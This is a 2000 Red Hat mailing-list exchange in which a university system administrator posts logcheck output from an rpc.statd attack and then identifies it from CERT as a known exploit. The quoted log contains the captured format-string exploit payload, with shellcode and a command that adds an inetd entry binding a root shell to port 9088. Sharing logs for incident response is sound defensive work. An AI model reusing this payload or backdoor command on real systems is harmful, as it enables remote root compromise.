Re: anyone seen this attack?

Gavin Mon, 06 Nov 2000 09:46:19 -0800
Uhhh, nevermind, it IS on CERT as an rpc.statd and wu-ftpd exploit. Now to
see if they got in...


Gavin Durman --- Xavier University LAN System Administrator
=================================================
[EMAIL PROTECTED]     ICQ: 20277424     http://durman.xu.edu

----------
>From: "Gavin" <[EMAIL PROTECTED]>
>To: [EMAIL PROTECTED]
>Subject: anyone seen this attack?
>Date: Mon, Nov 6, 2000, 12:56 PM
>

> Has anyone seen this type of attack before? I'm not sure just where to start
> looking other than CERT, but is it a dos, or an exploit of a particular
> OS/package? Thanks!
>
> Here you go...
>
> Active System Attack Alerts
> =-=-=-=-=-=-=-=-=-=-=-=-=-=
> Nov  3 23:45:03 www rpc.statd[366]: POSSIBLE SPOOF/ATTACK ATTEMPT!
>
> Security Violations
> =-=-=-=-=-=-=-=-=-=
> Nov  3 23:45:03 www rpc.statd[366]: POSSIBLE SPOOF/ATTACK ATTEMPT!
>
> Unusual System Events
> =-=-=-=-=-=-=-=-=-=-=
> Nov  3 18:01:00 www CROND[6057]: (root) CMD (run-parts /etc/cron.hourly)
> Nov  3 18:10:00 www CROND[6059]: (root) CMD (   /sbin/rmmod -as)
> Nov  3 18:20:00 www CROND[6061]: (root) CMD (   /sbin/rmmod -as)
> Nov  3 18:30:00 www CROND[6063]: (root) CMD (   /sbin/rmmod -as)
> Nov  3 18:40:00 www CROND[6065]: (root) CMD (   /sbin/rmmod -as)
> Nov  3 23:45:03 www rpc.statd[366]: SM_MON request for hostname containing
> '/': ^D���^D���^E���^E���^F���^F���^G���^G���%08x %08x %08x %08x %08x %08x
> %08x %08x %08x %08x %08x %08x %08x %08x
> %0242x%n%055x%n%012x%n%0192x%n\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20�K^\211v�\203�
>
> \215^(\203� \211^�\203� \215^.\203� \203� \203�#\211^�1�\203� \210F'
> \210F*\203� \210F�\211F��+, \211�\215N�\215V��\2001�\211�@�\200����/bin/sh
> -c echo "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd
> /tmp/m;
> Nov  3 23:45:03 www rpc.statd[366]: POSSIBLE SPOOF/ATTACK ATTEMPT!
> Nov  3 23:45:03 www rpc.statd[366]: STAT_FAIL to localhost for SM_MON of
> ^D���^D���^E���^E���^F���^F���^G���^G���%08x %08x %08x %08x %08x %08x %08x
> %08x %08x %08x %08x %08x %08x %08x
> %0242x%n%055x%n%012x%n%0192x%n\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20�K^\211v�\203�
>
> \215^(\203� \211^�\203� \215^.\203� \203� \203�#\211^�1�\203� \210F'
> \210F*\203� \210F�\211F��+, \211�\215N�\215V��\2001�\211�@�\200����/bin/sh
> -c echo "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd
> /tmp/m;
> Nov  3 18:50:00 www CROND[6067]: (root) CMD (   /sbin/rmmod -as)
> Nov  3 18:50:41 www rhnsd[6068]: running program /usr/sbin/rhn_check
> Nov  3 18:50:43 www rhnsd[766]: command returned:
> Nov  3 19:00:00 www CROND[6071]: (root) CMD (/bin/sh
> /usr/local/etc/logcheck.sh)
> Nov  3 19:00:00 www CROND[6072]: (root) CMD (   /sbin/rmmod -as)
>
>
> Gavin Durman --- Xavier University LAN System Administrator
> =================================================
> [EMAIL PROTECTED]     ICQ: 20277424     http://durman.xu.edu



_______________________________________________
Redhat-list mailing list
[EMAIL PROTECTED]
https://listman.redhat.com/mailman/listinfo/redhat-list
Re: anyone seen this attack?

Reply via email to
